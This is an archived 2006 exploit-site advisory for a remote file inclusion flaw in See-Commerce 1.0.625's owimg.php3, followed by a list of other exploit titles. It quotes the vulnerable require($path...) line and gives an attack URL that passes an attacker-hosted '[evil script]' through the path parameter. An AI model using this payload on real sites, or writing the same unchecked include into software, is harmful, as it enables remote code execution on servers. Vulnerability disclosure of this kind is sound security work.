exploits , vulnerabilities , articles , See-Commerce <= 1.0.625 (owimg.php3) Remote Include Vulnerability

2006-08-09

See-Commerce <= 1.0.625 (owimg.php3) Remote Include Vulnerability

Rated as : High Risk

See-Commerce Remote File Inclusion

CreW: ToXiC

Bug Found by Drago84

Source Code:
http://freshmeat.net/redir/seecommerce/14016/url_zip/sc-1.0.625.zip

Problem Is:
require($path."/ow.inc");

Page Affect:
http://[site]/[see-commerce directory]/owimg.php3?path=[evil script]

Greatz : Str0ke


securitydot.net - 2006-08-09

Exploits - newest 10 RSS | More

2007-06-15 57068 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34072 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42216 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29240 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19671 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16629 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19324 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16497 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33503 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17155 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit